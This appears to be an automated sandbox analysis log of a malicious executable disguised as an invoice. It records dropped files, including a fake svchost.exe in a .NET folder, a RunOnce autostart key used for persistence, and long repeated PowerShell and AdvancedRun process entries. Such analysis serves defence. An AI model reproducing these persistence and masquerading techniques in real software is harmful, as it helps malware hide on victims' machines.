        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exeJump to dropped file
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeJump to dropped file

        Boot Survival:

        barindex
        Creates an autostart registry key pointing to binary in C:\WindowsShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,3_2_00401306
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbYJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbYJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbYJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbYJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00408E31
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
